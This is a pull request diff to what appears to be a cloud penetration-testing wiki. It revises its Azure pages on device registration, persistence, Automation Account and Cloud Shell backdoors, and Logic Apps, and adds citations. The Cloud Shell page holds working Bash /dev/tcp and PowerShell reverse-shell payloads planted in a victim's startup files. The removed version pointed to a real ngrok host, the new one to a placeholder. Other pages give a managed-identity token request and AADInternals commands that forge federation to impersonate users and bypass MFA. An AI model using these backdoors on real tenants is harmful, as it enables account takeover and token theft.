### PR TITLE
Audit references for cloud pages 551-591

### DIFF
--- a/src/pentesting-cloud/azure-security/az-device-registration.md
+++ b/src/pentesting-cloud/azure-security/az-device-registration.md
@@ -1,24 +1,18 @@
 # Az - Device Registration
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-When a device joins AzureAD a new object is created in AzureAD.
+When a Windows device joins Microsoft Entra ID, the Device Registration Service (DRS) creates a device object in the tenant. During a managed join, the user authenticates, the client discovers the DRS endpoints, and any configured MDM terms are handled before registration. The client then creates two preferably TPM-bound RSA key pairs: the device key (`dkpub`/`dkpriv`) and the transport key (`tkpub`/`tkpriv`). It sends the ID token, certificate request, public transport key, and attestation data to DRS; DRS returns a device ID and a signed device certificate. MDM enrollment is a subsequent step, so an Entra device object does not by itself prove Intune enrollment.<sup>[[1]](#references)</sup>
 
-When registering a device, the **user is asked to login with his account** (asking for MFA if needed), then it request tokens for the device registration service and then ask a final confirmation prompt.
-
-Then, two RSA keypairs are generated in the device: The **device key** (**public** key) which is sent to **AzureAD** and the **transport** key (**private** key) which is stored in TPM if possible.
-
-Then, the **object** is generated in **AzureAD** (not in Intune) and AzureAD gives back to the device a **certificate** signed by it. You can check that the **device is AzureAD joined** and info about the **certificate** (like if it's protected by TPM).:
+Use the following command in the user's context to inspect join state, device-certificate metadata, TPM protection, and PRT state. In particular, `AzureAdJoined`, `Thumbprint`, `TpmProtected`, and `AzureAdPrt` describe different parts of that state.<sup>[[2]](#references)</sup>
 
 ```bash
 dsregcmd /status
 ```
 
-After the device registration a **Primary Refresh Token** is requested by the LSASS CloudAP module and given to the device. With the PRT is also delivered the **session key encrypted so only the device can decrypt it** (using the public key of the transport key) and it's **needed to use the PRT.**
+After sign-in on a Microsoft Entra joined Windows device, the CloudAP plug-in requests a **Primary Refresh Token (PRT)**. Entra ID returns the PRT together with a session key encrypted to the public transport key; the TPM-protected private transport key decrypts it, and the session key supplies proof of possession for later token requests and PRT renewal.<sup>[[3]](#references)</sup>
 
-For more information about what is a PRT check:
+For more information about PRTs, check:
 
 {{#ref}}
 az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
@@ -26,10 +20,9 @@ az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
 
 ### TPM - Trusted Platform Module
 
-The **TPM** **protects** against key **extraction** from a powered down device (if protected by PIN) nd from extracting the private material from the OS layer.\
-But it **doesn't protect** against **sniffing** the physical connection between the TPM and CPU or **using the cryptograpic material** in the TPM while the system is running from a process with **SYSTEM** rights.
+A functioning TPM prevents the protected device and transport private keys from being exported as ordinary key material and keeps PRT signing bound to the device. This substantially reduces offline extraction and replay, but it does not make a running, privileged endpoint trustworthy: research on the historical attacks below showed that an attacker able to obtain SSO artifacts or make the relevant platform calls could ask the legitimate device context to perform operations without exporting the TPM keys.<sup>[[3]](#references)[[4]](#references)</sup>
 
-If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys):
+Compromise of a PRT or abuse of its signing context can provide access as the signed-in user. For attack details, check:
 
 {{#ref}}
 az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
@@ -37,62 +30,62 @@ az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
 
 ## Registering a device with SSO tokens
 
-It would be possible for an attacker to request a token for the Microsoft device registration service from the compromised device and register it:
+Historically, an attacker on a compromised device could obtain SSO data, request an access token for the device-registration service, and register another device. The following was the original proof-of-concept flow retained for historical reference:<sup>[[4]](#references)</sup>
 
 ```bash
 # Initialize SSO flow
 roadrecon auth prt-init
 .\ROADtoken.exe <nonce>
 
-# Request token with PRT with PRT cookie
-roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie <cookie>
+# Request token with PRT cookie
+roadrecon auth -r <DEVICE_REGISTRATION_RESOURCE_ID> --prt-cookie <cookie>
 
-# Custom pyhton script to register a device (check roadtx)
+# Historical custom script; current ROADtools uses roadtx
 registerdevice.py
 ```
 
-Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**.
+The resulting certificate and private key represented a separate device identity and could be used with user credentials to request PRTs. In the vulnerable flow, the new PRT inherited the MFA claim from the SSO token, providing persistence and an MFA bypass.<sup>[[4]](#references)</sup>
 
 > [!TIP]
-> Note that to perform this attack you will need permissions to **register new devices**. Also, registering a device doesn't mean the device will be **allowed to enrol into Intune**.
+> The attack required permission to register devices. An Entra registration still did not imply that Intune would enroll or mark the device compliant.<sup>[[4]](#references)</sup>
 
 > [!CAUTION]
-> This attack was fixed in September 2021 as you can no longer register new devices using a SSO tokens. However, it's still possible to register devices in a legit way (having username, password and MFA if needed). Check: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md).
+> Microsoft blocked device registration with SSO tokens in September 2021. Legitimate device registration remains supported: current `roadtx` can submit a valid device-registration-service access token with `roadtx device`, and can request a PRT from a device identity plus supported user credentials or another valid token.<sup>[[4]](#references)[[5]](#references)</sup>
 
 ## Overwriting a device ticket
 
-It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info [**check this talk**](https://youtu.be/BduCn8cLV1A).
+The historical device-ticket attack used a ticket obtainable from a user session to overwrite a preregistered Autopilot device object. This returned a replacement device certificate and private key outside the original TPM, after which the attacker could request a persistent PRT carrying the user's MFA claim while retaining the device's compliance state. It did not directly extract the original PRT from the TPM.<sup>[[4]](#references)</sup>
 
 <figure><img src="../../images/image (32).png" alt=""><figcaption></figcaption></figure>
 
 > [!CAUTION]
-> However, this was fixed.
+> The Windows-side issue was patched in May 2022 as CVE-2022-30189, and the research records final server-side enforcement in February 2023.<sup>[[4]](#references)</sup>
 
 ## Overwrite WHFB key
 
-[**Check the original slides here**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf)
+The original *(Windows) Hello from the other side* slides describe two related historical Windows Hello for Business (WHFB) techniques.<sup>[[6]](#references)</sup>
 
 Attack summary:
 
-- It's possible to **overwrite** the **registered WHFB** key from a **device** via SSO
-- It **defeats TPM protection** as the key is **sniffed during the generation** of the new key
-- This also provides **persistence**
+- SSO data from a victim device could be used to provision or replace a registered WHFB key.<sup>[[6]](#references)</sup>
+- Because the attacker generated the replacement key, its private material was not protected by the victim's TPM.<sup>[[6]](#references)</sup>
+- The replacement WHFB credential could request PRTs and provide persistence.<sup>[[6]](#references)</sup>
 
 <figure><img src="../../images/image (34).png" alt=""><figcaption></figcaption></figure>
 
-Users can modify their own searchableDeviceKey property via the Azure AD Graph, however, the attacker needs to have a device in the tenant (registered on the fly or having stolen cert + key from a legit device) and a valid access token for the AAD Graph.
+The research also found that a user could historically modify their own `searchableDeviceKey` property through Azure AD Graph. Exploitation required a device identity in the tenant—newly registered or represented by a stolen device certificate and key—and a valid Azure AD Graph access token.<sup>[[6]](#references)</sup>
 
-Then, it's possible to generate a new key with:
+The historical proof of concept generated a key with:
 
 ```bash
 roadtx genhellokey -d <device id> -k tempkey.key
 ```
 
-and then PATCH the information of the searchableDeviceKey:
+It then patched the `searchableDeviceKey` value:
 
 <figure><img src="../../images/image (36).png" alt=""><figcaption></figcaption></figure>
 
-It's possible to get an access token from a user via **device code phishing** and abuse the previous steps to **steal his access**. For more information check:
+A device-code phishing flow could supply the user's access token for this chain. For related PRT and phishing details, check:
 
 {{#ref}}
 az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
@@ -100,11 +93,16 @@ az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
 
 <figure><img src="../../images/image (37).png" alt=""><figcaption></figcaption></figure>
 
+> [!CAUTION]
+> These paths are historical. The disclosure timeline states that fixes rolled out in May 2023: new keys could no longer be added through `searchableDeviceKey`, and the device-registration service began requiring the fresh `ngcmfa` claim for WHFB provisioning.<sup>[[6]](#references)</sup>
+
 ## References
 
-- [https://youtu.be/BduCn8cLV1A](https://youtu.be/BduCn8cLV1A)
-- [https://www.youtube.com/watch?v=x609c-MUZ_g](https://www.youtube.com/watch?v=x609c-MUZ_g)
-- [https://www.youtube.com/watch?v=AFay_58QubY](https://www.youtube.com/watch?v=AFay_58QubY)
+- [1] [How Microsoft Entra device registration works](https://learn.microsoft.com/en-us/entra/identity/devices/device-registration-how-it-works)
+- [2] [Troubleshoot devices by using the dsregcmd command](https://learn.microsoft.com/en-us/entra/identity/devices/troubleshoot-device-dsregcmd)
+- [3] [Understanding Primary Refresh Token (PRT) in Microsoft Entra ID](https://learn.microsoft.com/en-us/entra/identity/devices/concept-primary-refresh-token)
+- [4] [Breaking Azure AD joined endpoints in zero-trust environments](https://dirkjanm.io/assets/raw/Insomnihack%20Breaking%20and%20fixing%20Azure%20AD%20device%20identity%20security.pdf)
+- [5] [ROADtools Token eXchange (roadtx)](https://github.com/dirkjanm/ROADtools/wiki/ROADtools-Token-eXchange-%28roadtx%29)
+- [6] [(Windows) Hello from the other side](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf)
 
 {{#include ../../banners/hacktricks-training.md}}
-

--- a/src/pentesting-cloud/azure-security/az-persistence/README.md
+++ b/src/pentesting-cloud/azure-security/az-persistence/README.md
@@ -1,71 +1,91 @@
 # Az - Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ### OAuth Application
 
-By default, any user can register an application in Entra ID. So you can register an application (only for the target tenant) that needs high impact permissions with admin consent (an approve it if you are the admin) - like sending mail on a user's behalf, role management etc.T his will allow us to **execute phishing attacks** that would be very **fruitful** in case of success.
+By default, member users can register application objects in Entra ID. Separately, when an application is not yet represented in the tenant, the first user who grants consent causes its service principal to be created there.<sup>[[1]](#references)[[3]](#references)</sup>
 
-Moreover, you could also accept that application with your user as a way to maintain access over it.
+Register a single-tenant application in the target tenant and request high-impact application permissions with admin consent, such as `Mail.Send` or `RoleManagement.ReadWrite.Directory`. `Mail.Send` allows an app to send mail as any user without a signed-in user, while `RoleManagement.ReadWrite.Directory` allows it to manage directory-role membership; both application permissions require admin consent.<sup>[[2]](#references)</sup> If the consented app is made to look legitimate, this access can support phishing.
+
+An attacker-controlled OAuth application can also preserve delegated access if a user completes its consent flow and the attacker retains a refresh token issued for `offline_access`.<sup>[[17]](#references)</sup> The resulting service principal and permission grant remain in the tenant until they are revoked.<sup>[[1]](#references)</sup>
 
 ### Applications and Service Principals
 
-With privileges of Application Administrator, GA or a custom role with microsoft.directory/applications/credentials/update permissions, we can add credentials (secret or certificate) to an existing application.
+With Application Administrator or Global Administrator privileges, or a custom role containing `microsoft.directory/applications/credentials/update` at the applicable scope, we can add a client secret or certificate to an existing application. Application Administrators can then use those credentials to impersonate the application's identity, whose permissions may exceed the administrator's role.<sup>[[3]](#references)[[4]](#references)[[5]](#references)[[6]](#references)</sup>
 
-It's possible to **target an application with high permissions** or **add a new application** with high permissions.
+A credential-injection attack normally targets an existing application with privileged grants. Creating a new high-permission application additionally requires an administrator who can grant the requested application permissions.<sup>[[2]](#references)[[4]](#references)</sup>
 
-An interesting role to add to the application would be **Privileged authentication administrator role** as it allows to **reset password** of Global Administrators.
+If the application's service principal is granted the **Privileged Authentication Administrator** role, it can set or reset any authentication method, including passwords, for any user, including Global Administrators.<sup>[[6]](#references)</sup>
 
-This technique also allows to **bypass MFA**.
+A service-principal sign-in uses the application's own secret or certificate and does not involve a user; workload identities cannot perform MFA. Therefore, this authentication path can bypass a user MFA challenge, although Conditional Access policies can still block service principals.<sup>[[7]](#references)[[8]](#references)</sup>
 
-```bash
-$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
-$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
-Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
+For example, Az.Accounts supports client-secret service-principal login using a `PSCredential` containing the application ID and secret:<sup>[[9]](#references)</sup>
+
+```powershell
+$secret = ConvertTo-SecureString "<CLIENT_SECRET>" -AsPlainText -Force
+$credential = New-Object System.Management.Automation.PSCredential("<APPLICATION_ID>", $secret)
+Connect-AzAccount -ServicePrincipal -Credential $credential -Tenant "<TENANT_ID>"
 ```
 
-- For certificate based authentication
+- For certificate-based authentication, use the certificate-thumbprint form supported by `Connect-AzAccount`:<sup>[[9]](#references)</sup>
 
-```bash
-Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>
+```powershell
+Connect-AzAccount -ServicePrincipal -Tenant "<TENANT_ID>" -CertificateThumbprint "<CERTIFICATE_THUMBPRINT>" -ApplicationId "<APPLICATION_ID>"
 ```
 
 ### Federation - Token Signing Certificate
 
-With **DA privileges** on on-prem AD, it is possible to create and import **new Token signing** and **Token Decrypt certificates** that have a very long validity. This will allow us to **log-in as any user** whose ImuutableID we know.
+With **DA privileges** (or equivalent control of the on-premises AD FS deployment), it is possible to create and import **new token-signing** and **token-decrypting certificates** with a long validity. AD FS relies on the token-signing private key to sign tokens and the corresponding public key to validate them; AADInternals documents this attack path as enabling impersonation of any tenant user whose `ImmutableId` is known.<sup>[[10]](#references)[[11]](#references)[[13]](#references)</sup>
 
-**Run** the below command as **DA on the ADFS server(s)** to create new certs (default password 'AADInternals'), add them to ADFS, disable auto rollver and restart the service:
+**Run** the below command as **DA on the AD FS server(s)** to create new certificates, add them to AD FS, disable automatic rollover, restart the service, and export them with the default password `AADInternals`. The AADInternals documentation states that the generated copies are valid for 10 years:<sup>[[12]](#references)</sup>
 
-```bash
+```powershell
 New-AADIntADFSSelfSignedCertificates
 ```
 
-Then, update the certificate information with Azure AD:
+Then, update the certificate information in Entra ID for the federated domain:<sup>[[12]](#references)</sup>
 
-```bash
-Update-AADIntADFSFederationSettings -Domain cyberranges.io
+```powershell
+Update-AADIntADFSFederationSettings -Domain "<FEDERATED_DOMAIN>"
 ```
 
 ### Federation - Trusted Domain
 
-With GA privileges on a tenant, it's possible to **add a new domain** (must be verified), configure its authentication type to Federated and configure the domain to **trust a specific certificate** (any.sts in the below command) and issuer:
+With GA privileges on a tenant and control of the custom domain's DNS, it's possible to **add and verify the domain**, configure its authentication type as federated, and configure it to **trust a specific certificate** and issuer. Microsoft Graph represents this as an internal federation configuration for domains that are federated and verified, including `issuerUri` and `signingCertificate`.<sup>[[6]](#references)[[14]](#references)</sup>
 
-```bash
+The AADInternals backdoor function performs this conversion and uses an `any.sts/<8-byte hex-value>` issuer; its documentation describes using a known `ImmutableId` to log in as the user.<sup>[[12]](#references)[[13]](#references)</sup>
+
+The legacy MSOnline module that provided `Get-MsolUser` stopped working during its retirement rollout between early April and late May 2025; use Microsoft Graph's `onPremisesImmutableId` property instead.<sup>[[15]](#references)[[16]](#references)</sup> Use the returned identifier and issuer with `Open-AADIntOffice365Portal` to create a valid WS-Fed/SAML token and open the cloud application session:<sup>[[12]](#references)[[13]](#references)</sup>
+
+```powershell
 # Using AADInternals
-ConvertTo-AADIntBackdoor -DomainName cyberranges.io
+ConvertTo-AADIntBackdoor -DomainName "<VERIFIED_DOMAIN>"
 
-# Get ImmutableID of the user that we want to impersonate. Using Msol module
-Get-MsolUser | select userPrincipalName,ImmutableID
+# Get the ImmutableID of the user that we want to impersonate. Using Microsoft Graph PowerShell
+Get-MgUser -All -Property userPrincipalName,onPremisesImmutableId |
+    Select-Object UserPrincipalName,OnPremisesImmutableId
 
 # Access any cloud app as the user
-Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true
+Open-AADIntOffice365Portal -ImmutableID "<ON_PREMISES_IMMUTABLE_ID>" -Issuer "http://any.sts/<ISSUER_ID>" -UseBuiltInCertificate -ByPassMFA $true
 ```
 
 ## References
 
-- [https://aadinternalsbackdoor.azurewebsites.net/](https://aadinternalsbackdoor.azurewebsites.net/)
+- [1] [How and why apps are added to Microsoft Entra ID](https://learn.microsoft.com/en-us/entra/identity-platform/how-applications-are-added)
+- [2] [Microsoft Graph permissions reference](https://learn.microsoft.com/en-us/graph/permissions-reference)
+- [3] [Default user permissions in Microsoft Entra ID](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions)
+- [4] [Delegate application management administrator permissions](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/delegate-app-roles)
+- [5] [Add a certificate to an app by using Microsoft Graph](https://learn.microsoft.com/en-us/graph/applications-how-to-add-certificate)
+- [6] [Microsoft Entra built-in roles](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference)
+- [7] [Service principal sign-in logs in Microsoft Entra](https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-service-principal-sign-ins)
+- [8] [Conditional Access for workload identities](https://learn.microsoft.com/en-us/entra/identity/conditional-access/workload-identity)
+- [9] [Connect-AzAccount (Az.Accounts)](https://learn.microsoft.com/en-us/powershell/module/az.accounts/connect-azaccount?view=azps-15.6.0)
+- [10] [Token-signing certificates](https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/design/token-signing-certificates)
+- [11] [AD FS requirements for Windows Server](https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/design/ad-fs-requirements)
+- [12] [AADInternals documentation](https://aadinternals.com/aadinternals/)
+- [13] [Keys of the kingdom: Playing God as Global Admin](https://aadinternals.com/post/admin/)
+- [14] [internalDomainFederation resource type](https://learn.microsoft.com/en-us/graph/api/resources/internaldomainfederation?view=graph-rest-1.0)
+- [15] [Microsoft Entra releases and announcements archive](https://learn.microsoft.com/en-us/entra/fundamentals/whats-new-archive)
+- [16] [user resource type](https://learn.microsoft.com/en-us/graph/api/resources/user?view=graph-rest-1.0)
+- [17] [Scopes and permissions in the Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/scopes-oidc)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.md
+++ b/src/pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.md
@@ -1,8 +1,6 @@
 # Az - Automation Accounts Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
-## Storage Privesc
+## Persistence Techniques
 
 For more information about Automation Accounts check:
 
@@ -10,29 +8,35 @@ For more information about Automation Accounts check:
 ../az-services/az-automation-accounts.md
 {{#endref}}
 
+### Backdoor an existing runbook
 
-### Backdoor existing runbook
+An attacker with permission to edit and publish a runbook could insert code that executes whenever the runbook runs—for example, code that exfiltrates data or credentials available to the job. Azure Automation edits the draft version, while schedules and other start methods execute only the published version, so the attacker must also publish the modified draft for the backdoor to run.<sup>[[1]](#references)</sup>
 
-If an attacker has access to the automation account, he could **add a backdoor** to an existing runbook to **maintain persistence** and **exfiltrate data** like tokens every time the runbook is executed.
+### Schedules and webhooks
 
-### Schedules & Webhooks
+Create or modify a runbook and link it to a recurring schedule to execute the backdoor after the attacker's original access is removed. Azure Automation permits a runbook to be linked to multiple schedules and a schedule to multiple runbooks.<sup>[[2]](#references)</sup>
 
-Create or modify an existing Runbook and add a schedule or webhook to it. This will allow an attacker to **maintain persistence even if access over the environment was lost** by executing the backdoor which might be leaking tokens from the MI at specific times or whenever he wants by sending a request to the webhok.
+A webhook provides an alternative on-demand trigger. Anyone who possesses the webhook URL can invoke its linked published runbook because the URL embeds the security token and Azure Automation performs no additional authentication for a request made to the correct URL.<sup>[[3]](#references)</sup>
 
-### Malware inside a VM used in a hybrid worker group
+### Malware on a VM in a Hybrid Runbook Worker group
 
-If a VM is used as a hybrid worker group, an attacker could **install malware** inside the VM to **maintain persistence** and **exfiltrate data** like tokens for the managed identities given to the VM and to the automation account using the VM.
+If a VM is an Azure Automation Hybrid Runbook Worker, malware on that VM can provide host-level persistence and target the credentials available to runbook jobs. Depending on the Automation account configuration, a Hybrid Worker runbook on an Azure VM can authenticate with either the Automation account's system-assigned managed identity or a VM system- or user-assigned managed identity; enabling an Automation account managed identity prevents use of the VM identities.<sup>[[4]](#references)</sup>
 
 ### Custom environment packages
 
-If the automation account is using custom packages in custom environments, an attacker could **modify the package** to **maintain persistence** and **exfiltrate data** like tokens. This would also be a stealth persistence method as custom packages uploaded manually are rearely checked for malicious code.
+An attacker able to change the packages in a runtime environment could add malicious code that runs when linked runbooks load or use that package. Runtime environments define the packages required during runbook execution and support both public-gallery and self-authored customer packages.<sup>[[5]](#references)</sup> This can be subtle if defenders review only the runbook source and not its dependencies.
 
-### Compromise external repos
+### Compromise external repositories
 
-If the automation account is using external repos to store the code like Github, an attacker could **compromise the repo** to **maintain persistence** and **exfiltrate data** like tokens. This is specially interesting if the clatest evrsion of the code is automatically synced with the runbook.
+If source control integration is enabled, compromise of the connected GitHub or Azure DevOps repository can provide a path to persistent runbook modification. Azure Automation synchronizes repository content into the Automation account in one direction, and configurations can enable automatic synchronization after commits and automatic publication of synchronized runbooks. Microsoft currently documents source control integration as supported only for PowerShell 5.1 runbooks.<sup>[[6]](#references)</sup>
 
+## References
+
+- [1] [Manage runbooks in Azure Automation](https://learn.microsoft.com/en-us/azure/automation/manage-runbooks)
+- [2] [Manage schedules in Azure Automation](https://learn.microsoft.com/en-us/azure/automation/shared-resources/schedules)
+- [3] [Start an Azure Automation Runbook from a Webhook](https://learn.microsoft.com/en-us/azure/automation/automation-webhooks)
+- [4] [Run Automation runbooks on a Hybrid Runbook Worker](https://learn.microsoft.com/en-us/azure/automation/automation-hrw-run-runbooks)
+- [5] [Runtime environment in Azure Automation](https://learn.microsoft.com/en-us/azure/automation/runtime-environment-overview)
+- [6] [Use source control integration](https://learn.microsoft.com/en-us/azure/automation/source-control-integration)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
+++ b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
@@ -1,32 +1,34 @@
 # Az - Cloud Shell Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Cloud Shell Persistence
 
-Azure Cloud Shell offers command-line access to manage Azure resources with persistent storage and automatic authentication. Attackers can exploit this by placing backdoors in the persistent home directory:
+Azure Cloud Shell is an authenticated, browser-accessible Bash or PowerShell terminal for managing Azure resources. When persistent storage is configured, an attacker who can alter the persisted home directory can add startup commands that execute in later Cloud Shell sessions.<sup>[[1]](#references)[[2]](#references)</sup>
 
-* **Persistent Storage**: Azure Cloud Shell’s home directory is mounted on an Azure file share and remains intact even after the session ends.
-* **Startup Scripts**: Files like `.bashrc` or `config/PowerShell/Microsoft.PowerShell_profile.ps1` execute automatically at the start of each session, allowing for persistent execution when the cloud shell starts.
+* **Persistent storage**: Cloud Shell stores `$HOME` in a disk image under `.cloudconsole/acc_user.img` on an Azure Files share and synchronizes changes to that image. Ephemeral Cloud Shell sessions do not provide this persistence.<sup>[[2]](#references)</sup>
+* **Startup scripts**: Bash reads `~/.bashrc` when an interactive non-login shell starts, while the Cloud Shell PowerShell profile is `~/.config/PowerShell/Microsoft.PowerShell_profile.ps1`. Commands planted in either file can therefore execute when the corresponding shell starts.<sup>[[3]](#references)[[4]](#references)</sup>
 
-Example backdoor in .bashrc:
+Example backdoor in `.bashrc`:
 
 ```bash
-echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc
+echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/<ATTACKER_HOST>/<ATTACKER_PORT> 0>&1 &)' >> $HOME/.bashrc
 ```
 
-This backdoor can execute commands even 5 minutes after the cloud shell is finished by the user.
+The durable component is the modification to `$HOME`, not the process created on the temporary host. The process is bounded by that host's lifetime, while the startup command can run again in later storage-backed sessions; Cloud Shell currently times out after 20 minutes without interactive activity.<sup>[[1]](#references)</sup>
 
-Additionally query Azure’s metadata service for instance details and tokens:
+Cloud Shell automatically authenticates Azure CLI and Azure PowerShell for the signed-in user. It exposes an alternative managed-identity-style endpoint through `$MSI_ENDPOINT` for requesting user tokens for supported audiences; this differs from the `169.254.169.254` IMDS endpoint used by Azure VMs.<sup>[[1]](#references)[[5]](#references)[[6]](#references)[[7]](#references)</sup>
+
 ```bash
-curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s
+curl -s -G -H "Metadata:true" \
+  --data-urlencode "api-version=2018-02-01" \
+  --data-urlencode "resource=https://management.azure.com/" \
+  "$MSI_ENDPOINT"
 ```
 
 ### Cloud Shell Phishing
 
-If an attacker finds other users images in a Storage Accout he has write and read access to, he will be able to download the image, **add a bash and PS backdoor into it**, and upload it back to the Storage Account so next time the user access the shell, the **commands will be automatically executed**.
+If an attacker has read and write access to the Azure file share backing another user's persistent Cloud Shell, they can tamper with that user's `.cloudconsole/acc_<user>.img`. Microsoft warns that identities with sufficient inherited permissions can access Cloud Shell storage accounts and file shares, and recommends restricting access at the storage-account or subscription level.<sup>[[2]](#references)</sup>
 
-- **Download, backdoor and uplaod the image:**
+One possible workflow is to download the image to a Linux host, mount it, add Bash and PowerShell startup payloads, unmount it, and upload it to the original path:
 
 ```bash
 # Download image
@@ -35,31 +37,39 @@ az storage file download-batch -d /tmp/phishing_img --account-name <acc-name> -s
 
 # Mount the image
 mkdir /tmp/backdoor_img
-sudo mount ./.cloudconsole/acc_carlos.img /tmp/backdoor_img
+sudo mount -o loop /tmp/phishing_img/.cloudconsole/acc_username.img /tmp/backdoor_img
 cd /tmp/backdoor_img
 
 # Create backdoor
-mkdir .config
-mkdir .config/PowerShell
+mkdir -p .config/PowerShell
 touch .config/PowerShell/Microsoft.PowerShell_profile.ps1
-chmod 777 .config/PowerShell/Microsoft.PowerShell_profile.ps1
+chown --reference=.bashrc .config/PowerShell/Microsoft.PowerShell_profile.ps1
+chmod 600 .config/PowerShell/Microsoft.PowerShell_profile.ps1
 
 # Bash backdoor
-echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/${SERVER}/${PORT} 0>&1 &)' >> .bashrc
+echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/<ATTACKER_HOST>/<ATTACKER_PORT> 0>&1 &)' >> .bashrc
 
 # PS backdoor
-echo '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19838);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' >> .config/PowerShell/Microsoft.PowerShell_profile.ps1
+echo '$client = New-Object System.Net.Sockets.TCPClient("<ATTACKER_HOST>",<ATTACKER_PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' >> .config/PowerShell/Microsoft.PowerShell_profile.ps1
 
 # Unmount
 cd /tmp
 sudo umount /tmp/backdoor_img
 
 # Upload image
-az storage file upload --account-name <acc-name> --path ".cloudconsole/acc_username.img" --source "./tmp/phishing_img/.cloudconsole/acc_username.img" -s <file-share>
+az storage file upload --account-name <acc-name> --path ".cloudconsole/acc_username.img" --source "/tmp/phishing_img/.cloudconsole/acc_username.img" -s <file-share>
 ```
 
-- **Then, phish the user to access https://shell.azure.com/**
+The final step is to induce the user to start a new session at `https://shell.azure.com/`, causing the modified startup file to run.
 
+## References
+
+- [1] [What is Azure Cloud Shell?](https://learn.microsoft.com/en-us/azure/cloud-shell/overview)
+- [2] [Persist files in Azure Cloud Shell](https://learn.microsoft.com/en-us/azure/cloud-shell/persisting-shell-storage)
+- [3] [Bash Startup Files](https://www.gnu.org/software/bash/manual/html_node/Bash-Startup-Files.html)
+- [4] [Predictive IntelliSense in Azure Cloud Shell](https://learn.microsoft.com/en-us/azure/cloud-shell/cloud-shell-predictive-intellisense)
+- [5] [Azure Cloud Shell frequently asked questions](https://learn.microsoft.com/en-us/azure/cloud-shell/faq-troubleshooting)
+- [6] [Azure Cloud Shell, az login, and Managed Identity](https://edyoung.github.io/blog/cloud_shell_auth/)
+- [7] [Some environment variables in Cloud Shell](https://edyoung.github.io/blog/vars/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-

--- a/src/pentesting-cloud/azure-security/az-persistence/az-logic-apps-persistence.md
+++ b/src/pentesting-cloud/azure-security/az-persistence/az-logic-apps-persistence.md
@@ -1,7 +1,5 @@
 # Az - Logic Apps Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Logic Apps
 
 For more information check:
@@ -12,9 +10,12 @@ For more information check:
 
 ### Common Persistence Techniques
 
-- Backdoor an existing workflow or create a new one that will perform some persistence action (like leaking an access token of an administrator MI) and keep the SAS URL to trigger it
